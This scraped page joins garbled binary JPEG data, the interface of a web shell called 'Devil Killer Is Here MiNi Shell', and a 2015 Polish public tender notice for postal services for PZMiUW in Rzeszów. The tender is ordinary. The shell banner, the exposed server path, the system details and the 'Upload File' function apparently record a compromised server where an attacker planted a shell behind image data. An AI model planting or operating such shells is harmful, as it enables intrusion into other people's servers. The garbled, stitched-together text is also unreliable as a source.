JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151110/303690-N-2015.html

<p class="kh_header"><b>Rzeszów: Świadczenie usług pocztowych dla PZMiUW w Rzeszowie.</b><br>
<b>Numer ogłoszenia: 303690 - 2015; data zamieszczenia: 10.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpacki Zarząd Melioracji i Urządzeń Wodnych , ul. Hetmańska 9, 35-959 Rzeszów, woj. podkarpackie, tel. 17 8537 440, faks 17 8536421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojewódzka samorz.jedn.organizacyjna nieposiadająca osob. prawnej (jednostka budżetowa).</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych dla PZMiUW w Rzeszowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1./ Opis przedmiotu zamówienia
	
Przedmiotem  zamówienia jest świadczenie  usług pocztowych  w obrocie krajowym i zagranicznym  przez Wykonawcę w zakresie  przyjmowania , przemieszczania i  doręczania  przesyłek  pocztowych i kurierskich  oraz ewentualnych ich  zwrotów  w rozumieniu ustawy  Prawo Pocztowe ( Dz.U  z 2012 r. poz. 1529 )  nadawanych przez  Podkarpacki Zarząd Melioracji i Urządzeń Wodnych  w Rzeszowie , zgodnie z następującymi  wytycznymi :
1.Usługa doręczania polegająca  na przyjmowaniu, przemieszczaniu  i doręczaniu  przesyłek pocztowych  w gabarytach  A i B , będzie wykonywana na podstawie umowy , w której wyrażona zostanie zgoda na skredytowaną  formę uiszczania opłaty  w formie opłaty z dołu za usługi pocztowe.
2.Usługi  świadczone przez Wykonawcę w odniesieniu do przesyłek nadawanych przez Zamawiającego jako stronę w postępowaniu administracyjnym lub podatkowym powinny spełniać warunki skutecznego  i prawidłowego doręczenia określone  odpowiednio w kodeksie postępowania administracyjnego, lub ordynacji  podatkowej.
3.Umowa obowiązywać będzie  od dnia zawarcia. do 31.12.2018r.

2./ Szczegółowy opis przedmiotu zamówienia :

1.Przez przesyłki pocztowe będące przedmiotem zamówienia rozumie się:

A)Przesyłki listowe:
1) zwykłe ekonomiczne - przesyłki nierejestrowane nie będące przesyłkami najszybszej kategorii  w obrocie krajowym i zagranicznym,
2) zwykłe priorytetowe - przesyłki nierejestrowane najszybszej kategorii w obrocie krajowym i zagranicznym,
3) polecone  ekonomiczne- przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii  w obrocie krajowym,
4) polecone priorytetowe - przesyłki rejestrowane najszybszej kategorii w obrocie krajowym i zagranicznym,
5) polecone za zwrotnym potwierdzeniem odbioru (ZPO) - przesyłki nie będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za	 pokwitowaniem odbioru w obrocie krajowym i zagranicznym,
6) polecone priorytetowe za zwrotnym potwierdzeniem odbioru (ZPO) - przesyłki najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za  pokwitowaniem odbioru w obrocie krajowym i zagranicznym,

GABARYT  A  to przesyłki o wymiarach:
MINIMUM - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm,
MAKSIMUM - żaden z wymiarów nie może przekroczyć: grubość (wysokość) 20 mm, długość  325 mm, szerokość 230 mm.

GABARYT  B  to przesyłki o wymiarach:
MINIMUM - jeśli choć jeden z wymiarów przekracza grubość (wysokość) 20 mm lub
długość 325 mm, lub szerokość 230 mm,
MAKSIMUM - suma długości, szerokości  i grubości (wysokości) 900 mm, przy czym
największy z tych wymiarów (długość) nie może przekroczyć 600 mm.
Wszystkie wymiary przyjmuje się z tolerancją +/- 2 mm.

B)Paczki  pocztowe  o wadze do 10 000 g ( gabaryt A i B ):
1) zwykłe ekonomiczne - rejestrowane  nie będące paczkami najszybszej  kategorii
2) priorytetowe - rejestrowane najszybszej kategorii.
3) ze zwrotnym potwierdzeniem odbioru  ( ZPO) - rejestrowane  zwykłe i priorytetowe przyjęte  za pokwitowaniem przyjęcia i doręczane za pokwitowaniem odbioru.

Gabaryt A to paczka o wymiarach :
-Minimum - wymiary strony adresowej  nie mogą być mniejsze  niż 90x140 mm
-Maksimum - żaden z wymiarów  nie może przekroczyć długości 600 mm, szerokości 500 mm, grubości (wysokości) 300 mm.

Gabaryt B to paczka o wymiarach :
-Minimum - jeśli choć jeden z wymiarów  przekracza długość 600 mm, szerokość 500 mm, grubość (wysokość) 300 mm.
-Maksimum - suma długości i największego obwodu mierzonego w innym kierunku niż długość -3000 mm , przy czym największy wymiar  nie może przekroczyć 1500 mm

C)Paczki  pocztowe  o wadze  ponad  10 000 g  do 30 000 g ( gabaryt A i B ):
1) zwykłe  ekonomiczne - rejestrowane  nie będące paczkami najszybszej  kategorii
2) priorytetowe - rejestrowane najszybszej kategorii.
3) ze zwrotnym potwierdzeniem odbioru  ( ZPO) - rejestrowane  zwykłe i priorytetowe przyjęte  za pokwitowaniem przyjęcia i doręczane za pokwitowaniem odbioru.

Gabaryt A to paczka o wymiarach :
-Minimum - wymiary strony adresowej  nie mogą być mniejsze  niż 150 x 200 mm
-Maksimum - żaden z wymiarów  nie może przekroczyć długości 600 mm, szerokości 500 mm, grubości (wysokości) 300 mm.

Gabaryt B to paczka o wymiarach :
-Minimum - jeśli choć jeden z wymiarów  przekracza długość 600 mm, szerokość 500 mm, grubość (wysokość) 300 mm,
-Maksimum - suma długości i największego obwodu mierzonego w innym kierunku niż długość -3000 mm , przy czym największy wymiar  nie może przekroczyć 1500 mm

D)Przesyłki kurierskie w obrocie krajowym  i zagranicznym  -  przesyłka listowa, będąca przesyłką rejestrowaną  lub paczka pocztowa, przyjmowana, sortowana, przemieszczana i doręczana  w sposób łącznie zapewniający : 
-Bezpośredni odbiór przesyłki  pocztowej od nadawcy
-Śledzenie przesyłki pocztowej od momentu nadania  do doręczenia
-Doręczenie przesyłki pocztowej w gwarantowanym terminie 

2.Do obowiązków  Wykonawcy  należeć  będzie : 
1)Odbiór  przesyłek przez upoważnionego  przedstawiciela Wykonawcy ( po okazaniu upoważnienia )  raz dziennie w dni robocze  od poniedziałku do piątku pomiędzy godz. 14°° a godz. 15°° z siedziby Zamawiającego  w Rzeszowie przy ul. Hetmańskiej 9 ( nadanie przesyłek  następować  będzie w dniu ich odbioru przez Wykonawcę od Zamawiającego).
2) Potwierdzania każdorazowo przyjętych do wyekspediowania w kraju i zagranicę przesyłek pieczęcią,  podpisem i datą  w pocztowej książce nadawczej ( dla przesyłek rejestrowanych) oraz  na zestawieniu ilościowym i wartościowym zawierającym  wyszczególnienie  przygotowanych przesyłek z podziałem  według poszczególnych  kategorii  wagowych i rodzajowych.
3)Zwrot do siedziby  Zamawiającego  zestawień  nadanych przesyłek w dniu następnym do godz. 15°°
4)Wykonawca  będzie doręczał przesyłki krajowe w czasie nie dłuższym niż wskazany w Załączniku nr 1 do rozporządzenia Ministra Administracji i Cyfryzacji  z dnia 29 kwietnia 2013 roku w sprawie warunków  wykonywania usług powszechnych przez operatora wyznaczonego (Dz.U. r.2013 poz.545 ), 
5)Doręczanie  przesyłek adresatowi będzie odbywało się  na zasadach  określonych  w art.37  ustawy  z dnia 23 listopada 2012 r. Prawo pocztowe (Dz.U.  z 2012 r. poz. 1529 )
6)W przypadku nieobecności adresata lub braku możliwości dostarczenia w sposób określony w pkt.5 przedstawiciel Wykonawcy stosuje zasady doręczenia zgodne z  art. 44 Kodeksu postępowania administracyjnego.
7)Jednostkom  organizacyjnym  i organizacjom społecznym przesyłki  doręcza się w lokalu  ich siedziby, osobom uprawnionym do odbioru  przesyłek. 
8)Potwierdzeniem  doręczenia przesyłki  jest podpis odbierającego ze wskazaniem daty odbioru. W razie braku  możliwości uzyskania potwierdzenia odbioru, doręczający  sam stwierdza  datę doręczenia oraz wskazuje  osobę, która odebrała przesyłkę  oraz przyczynę braku jej podpisu.

3.Do  obowiązków   Zamawiającego  będzie należeć :
1)Opakowanie  przesyłek  listowych i paczek  w sposób umożliwiający  Wykonawcy doręczanie  bez ubytku  i uszkodzenia do miejsca  zgodnie z  adresem przeznaczenia: opakowanie  przesyłek listowych stanowi  zaklejona koperta Zamawiającego, opakowanie  paczki  stanowi  sztywne pudełko  lub  papier Zamawiającego: Zamawiający dopuszcza stosowanie  przez Wykonawcę własnych opakowań na listy i przesyłki pod warunkiem, że  nie jest to dodatkowo płatne.
2)Umieszczanie na przesyłce  listowej  lub paczce w sposób czytelny nazwy odbiorcy wraz z jego adresem (podany jednocześnie w pocztowej książce nadawczej w przypadku przesyłki rejestrowanej), określając jednocześnie rodzaj przesyłki oraz umieszczając na stronie  adresowej każdej nadawanej przesyłki  pieczątki określającej pełną  nazwę i adres Zamawiającego. 
3)Nadawanie  przesyłek  w stanie uporządkowanym, należy przez to rozumieć :
-  dla  przesyłek  rejestrowanych: sporządzenie książki  nadawczej; oryginalne strony  pocztowej książki nadawczej  będą przeznaczone dla Wykonawcy w celach  rozliczeniowych, a kopie  stanowić będą dla Zamawiającego potwierdzenie nadanej partii  przesyłek.
- sporządzenie zestawienia  ilościowego  i wartościowego przesyłek wg rodzaju i wagi                               ( rejestrowane, nierejestrowane, paczki ), z których oryginał będzie przeznaczony  dla Wykonawcy w celach rozliczeniowych, a kopia stanowić  będzie dla Zamawiającego potwierdzenie nadania  danej partii  przesyłek : zestawienie to  będzie stanowiło  również  potwierdzenie odbioru  przesyłek  w ramach  usługi odbioru  przesyłek  z siedziby Zamawiającego.
4.  Pozostałe  postanowienia :
1) Z uwagi  na  specyfikę  wykonywanych  zadań, Zamawiający informuje, że do 5% generowanych przesyłek stanowią przesyłki nadawane przez Zamawiającego jako stronę w postępowaniu administracyjnym lub podatkowym. Dowód nadania w/w przesyłek powinien spełniać  warunki konieczne dla skutecznego  i prawidłowego doręczenia określone  odpowiednio w kodeksie postępowania administracyjnego lub ordynacji  podatkowej, tj.  aby potwierdzenie  ich nadania miało  moc  dokumentu  urzędowego.   
2)  Zamawiający będzie korzystał również z własnych wzorów druków potwierdzenia odbioru w celu doręczania przesyłek na zasadach określonych w ustawie z dnia 14 czerwca 1960r. - Kodeks Postępowania administracyjnego (Dz.U. z 2000r. Nr. 98, poz. 1071, z późn. zm.).
3) Wykonawca będzie doręczał do siedziby Zamawiającego pokwitowane przez adresata potwierdzenie odbioru przesyłki niezwłocznie po doręczeniu przesyłki. W przypadku nieobecności adresata, przedstawiciel  Wykonawcy  pozostawia zawiadomienie o próbie doręczenia przesyłki (awizo) ze wskazaniem, gdzie i kiedy adresat może odebrać przesyłkę w terminie 7 kolejnych dni, licząc od dnia następnego po dniu zostawienia zawiadomienia u adresata. Jeżeli adresat nie zgłosi się po odbiór przesyłki w w/w terminie, Wykonawca sporządza powtórne zawiadomienie o możliwości jej odbioru w terminie kolejnych 7 dni. Po upływie terminu odbioru przesyłka niezwłocznie zwracana jest Zamawiającemu.
4)  Wykonawca będzie stosował własne znaki służące do potwierdzenia opłat dotyczących usługi pocztowej i oznaczenia umożliwiające identyfikację umowy, na podstawie której świadczone są usługi pocztowe.
5)  Zamawiający będzie wysyłał  korespondencję w imieniu własnym, z zastrzeżeniem dopuszczalności odstępstwa od tej zasady w stosunku do korespondencji w postępowaniach administracyjnych i wg ordynacji podatkowej, w których Zamawiający jest stroną. 
6)   Zamawiający wymaga, aby Wykonawca dysponował   punktami  nadawczymi  w miejscowościach, w których  znajdują  się siedziba, oddziały  i inspektoraty  Zamawiającego lub zapewniał  Zamawiającemu  możliwość  nadania  przesyłek  przez Zamawiającego  w miejscowościach gdzie znajduje się  siedziba  oraz oddziały i  inspektoraty w dni robocze (tj. od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy) w godzinach od 10:00 do 16:00. 
Zamawiający wymaga również,  aby Wykonawca  dysponował  punktami  odbioru niedoręczonych  pod adres  przesyłek (awizowanych)  na terenie każdej  gminy   województwa podkarpackiego  lub zapewniał  możliwość  odbioru przesyłki  przez adresata  w gminie  miejsca  zamieszkania  lub  gminie  sąsiedniej. 
W przypadku gdy Wykonawca nie spełni  w/w wymogu Zamawiający  zastrzega sobie  uprawnienie do naliczenia kary umownej  w wysokości 1% całkowitego  szacunkowego  wynagrodzenia  Wykonawcy  brutto  określonego w umowie  za każdy stwierdzony  przypadek  naruszenia. Uprawnienia powyższe nie wyłączają  możliwości odstąpienia przez  Zamawiającego od umowy ze skutkiem natychmiastowym  bez odszkodowania. Wykonawca wyraża bezwarunkową i nieodwołalną  zgodę  na potrącenie kar  umownych  z przysługującego mu wynagrodzenia.
7)Uiszczenie opłat od przesyłek listowych będzie następowało z dołu w formie opłaty skredytowanej. Zamawiający będzie umieszczał oznaczenie podstawy świadczenia usług (nr umowy)   w postaci napisu, nadruku lub odcisku pieczęci  o treści ustalonej z Wykonawcą.
8)Waga przesyłki określona będzie w stanie zamkniętym.

9)Zamawiający za okres rozliczeniowy do fakturowania uznaje miesiąc kalendarzowy. Podstawą obliczenia należności będzie suma opłat  za przesyłki  faktycznie nadane lub zwrócone z powodu braku możliwości ich doręczenia  w okresie rozliczeniowym, potwierdzona, co do ich liczby i wagi na podstawie  dokumentów nadawczych lub oddawczych, przy czym obowiązywać będą ceny  jednostkowe podane w formularzu cenowym, a w przypadku zmiany cen na warunkach określonych w s.i.w.z.- zgodnie z dokumentem zatwierdzającym te zmiany. Ceny określone w formularzu cenowym powinny zawierać wszystkie opłaty Wykonawcy. Należność będzie płatna w terminie do 21 dni od daty wystawienia faktury VAT Zamawiającemu. Za dzień zapłaty strony przyjmują dzień obciążenia rachunku bankowego Zamawiającego. 
10)	Przewidywana ilość  przesyłek różnych  rodzajów dla okresu 3 lat realizacji zamówienia została wskazana w Zakresie rzeczowo-finansowym  stanowiącym  Załącznik nr 1  do SIWZ  na podstawie danych rzeczywistych za okres 12 miesięcy tj.: 01.09.2014-31.08.2015. Zamawiający  zastrzega sobie, że rzeczywiste  ilości przesyłek będą wynikać  z aktualnych potrzeb Zamawiającego i mogą odbiegać od ilości podanych  w formularzu cenowym. Podane w formularzu cenowym, złożonym wraz z ofertą, ilości poszczególnych przesyłek są ilościami szacunkowymi. Wykonawcy nie przysługuje roszczenie  o wykonanie ilości przesyłek  określonej w formularzu cenowym.
11)W przypadku nadania przez Zamawiającego większej ilości przesyłek danej kategorii , usługi te będą rozliczane według cen jednostkowych wynikających z formularza cenowego.
12) W przypadku wysyłki przez  Zamawiającego przesyłki  nieokreślonej  w formularzu cenowym, rozliczenie nastąpi  zgodnie  z ogólnie obowiązującymi  cennikami  Wykonawcy.  
13) Cena  podana przez Wykonawcę  nie będzie podlegała zmianom  przez okres realizacji zamówienia, z poniższymi wyjątkami:
a) w przypadku  zmiany stawki  podatku VAT na  usługi pocztowe  może nastąpić zmiana cen jednostkowych odpowiednio do zmiany stawki podatku,
b) w przypadku, jeśli konieczność wprowadzenia zmian umowy wynika z uregulowań prawnych, 
c) ceny określone  przez Wykonawcę w ofercie ulegną  obniżeniu  w toku realizacji zamówienia w przypadku, gdy opłaty pocztowe wynikające ze standardowego  cennika  lub regulaminu  Wykonawcy będą  niższe od cen wynikających  z przedłożonej  oferty. 
 Wykonawca  ma obowiązek stosowania  względem  Zamawiającego  obniżonych opłat pocztowych wynikających ze swojego aktualnego cennika lub regulaminu począwszy od dnia wprowadzenia zmiany. W zakresie, w którym ceny przedstawione w ofercie są korzystniejsze dla Zamawiającego stosuje się te ceny.
d) Zamawiającemu  przysługuje  możliwość  korzystania z programów rabatowych (opustowych) oferowanych  przez Wykonawcę  w toku  realizowanej umowy. 
14) W  przypadku  nieterminowego  odbioru przesyłek przygotowanych do wyekspediowania, Zamawiającemu przysługuje  prawo  do naliczenia kary umownej za każdy dzień opóźnienia w wysokości   0,5% miesięcznej kwoty  za usługę odbioru przesyłek  od  Zamawiającego za każdy  dzień zwłoki nie mniej jednak niż 50 zł.
15) Za niewykonanie lub nienależyte  wykonanie usługi pocztowej Wykonawca ponosi  odpowiedzialność zgodnie z przepisami  wykonawczymi  ustawy z dnia 23 listopada 2012 r. Prawo pocztowe ( Dz.U z 2012 poz.1529 )
16) Przez  Wykonawcę rozumie się  przedsiębiorcę uprawnionego do wykonywania  działalności pocztowej na podstawie wpisu do rejestru operatorów  pocztowych .
17) Wykonawca  zobowiązany jest świadczyć usługi  pocztowe  zgodnie z powszechnie obowiązującymi  przepisami prawa, a w szczególności :
a) Ustawą  z dnia 23 listopada 2012 r. Prawo Pocztowe ( Dz.U z 2012 r. poz.1529 )
b)  Rozporządzeniem  Ministra Administracji i Cyfryzacji  z dnia  29 kwietnia 2013 r.  w sprawie  warunków  wykonywania  usług powszechnych  przez operatora  wyznaczonego  ( Dz.U z 2013 r poz.545 ), w zakresie, w jakim dotyczy, 
c)  Rozporządzeniem  Ministra  Administracji i Cyfryzacji z dnia 26.11.2013r. w sprawie reklamacji usługi pocztowej (Dz.U.2013.1468)
d) inne akty prawne  związane  z realizacją usług  będących  przedmiotem  zamówienia.
18)  Przesyłki  nadawane będą przez następujące jednostki  organizacyjne  Zamawiającego:  
Lp./Inspektoraty/adres
1/Rzeszów - siedziba 	35-959  Rzeszów ul. Hetmańska 9,
2/Inspektorat Leżajsk	37-300  Leżajsk ul. Mickiewicza 79,
3/Inspektorat Leżajsk z/s Łańcut	37-100  Łańcut ul. Grunwaldzka 21,
4/Inspektorat Dębicko - Ropczycki	39-200  Dębica ul. Piłsudskiego 19,
5/Inspektorat Dębicko - Ropczycki	39-100  Ropczyce 
ul. Najświętszej Marii Panny 2,
6/Oddział   Sanok 	38-500  Sanok  ul. Piłsudskiego 10,
7/Inspektorat  Krosno 	38-400  Krosno  ul. Żółkiewskiego 10,
8/Inspektorat  Jasło	38-200  Jasło ul. Stroma 2,
9/Oddział   Jarosław	37-500  Jarosław ul. Traugutta 9,
10/Inspektorat  Lubaczów 	37-600  Lubaczów ul. Słowackiego 13,
11/Oddział    Tarnobrzeg 	39-400 Tarnobrzeg ul. Sienkiewicza 86,
12/Inspektorat Mielec	39-300 Mielec ul. Korczaka 4,
13/Inspektorat Nisko	37-400	Nisko  ul. Rudnicka 15,

5.Usługi kurierskie świadczone będą  na poniższych warunkach : 
1)Maksymalna waga  nadawanej  przesyłki do 20 kg 
2)Zamawiający nie przewiduje nadawania przesyłek  wielkogabarytowych  
3)Rodzaj  przesyłek :  Przesyłki krajowe  - obszar całej Polski
4)Odbiór przesyłek  przez  kuriera  będzie następował  wyłącznie w dni robocze , nie później niż   do godz. 15°°  z siedziby  Zamawiającego.
5) Zamawiający zastrzega sobie możliwość zmiany miejsc odbioru  przesyłek w trakcie  trwania umowy w przypadku zmiany miejsc prowadzenia przez niego działalności (tj. adresy oddziałów inspektoratów). Zmiana  zostanie wprowadzona za pomocą    aneksu do umowy.
6) Zamawiający nie przewiduje  oczekiwania  kuriera  na odbiór przesyłki od Zamawiającego.
7) Do obowiązków  Wykonawcy  należy załadunek odebranych przesyłek.
8)   Zlecenia  nadania  przesyłek  będą składane telefonicznie, faksem, pocztą  elektroniczną lub za pomocą formularza na stronie  internetowej Wykonawcy. 
9)  Zamawiający wymaga dostarczenia mu kopii  listu przewozowego potwierdzającego dostarczenie przesyłki albo innego dokumentu  poświadczającego  doręczenie każdej nadanej przez Zamawiającego  przesyłki. Koszt usługi winien być wliczony w cenę oferty.
10) Przesyłki krajowe będą ubezpieczone  od uszkodzenia lub utraty. Koszt tego ubezpieczenia należy wliczyć w cenę oferty.
11) Okresem rozliczeniowym  jest miesiąc  kalendarzowy.
12) Przewidywana ilość  przesyłek kurierskich  różnych  rodzajów dla okresu 3 lat realizacji zamówienia została wskazana w formularzu cenowym  stanowiącym  Załącznik nr 1 do SIWZ na podstawie danych rzeczywistych za okres 12 m-cy, tj.: 01.09.2014-31.08.2015). Zamawiający  zastrzega sobie, że rzeczywiste  ilości przesyłek będą wynikać  z aktualnych potrzeb Zamawiającego i mogą odbiegać od ilości podanych  w formularzu cenowym. Podane w formularzu cenowym złożonym wraz z ofertą, ilości poszczególnych przesyłek są ilościami szacunkowymi. Wykonawcy nie przysługuje roszczenie  o wykonanie ilości przesyłek  określonej w formularzu cenowym..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>1)Zamawiający przewiduje udzielenie zamówień uzupełniających.
2)Przedmiotem zamówień uzupełniających będą usługi tego samego rodzaju, zgodne z zakresem przedmiotowym zamówienia podstawowego.
3)Wartość zamówień uzupełniających wynosić będzie maksymalnie 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.12.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunki udziału w postępowaniu i posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Warunek ten zostanie spełniony, jeśli wykonawca wykaże, iż posiada uprawnienia do wykonywania działalności pocztowej, na podstawie wpisu do rejestru operatorów pocztowych, prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (Dz. U. z 2012 r. poz. 1529)
W przypadku złożenia oferty wspólnej przez dwóch lub więcej Wykonawców w/w warunek powinien być spełniony przez każdy z podmiotów wspólnie ubiegających się o udzielenie zamówienia.
Kwalifikacja na podstawie Załącznika nr 4 do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
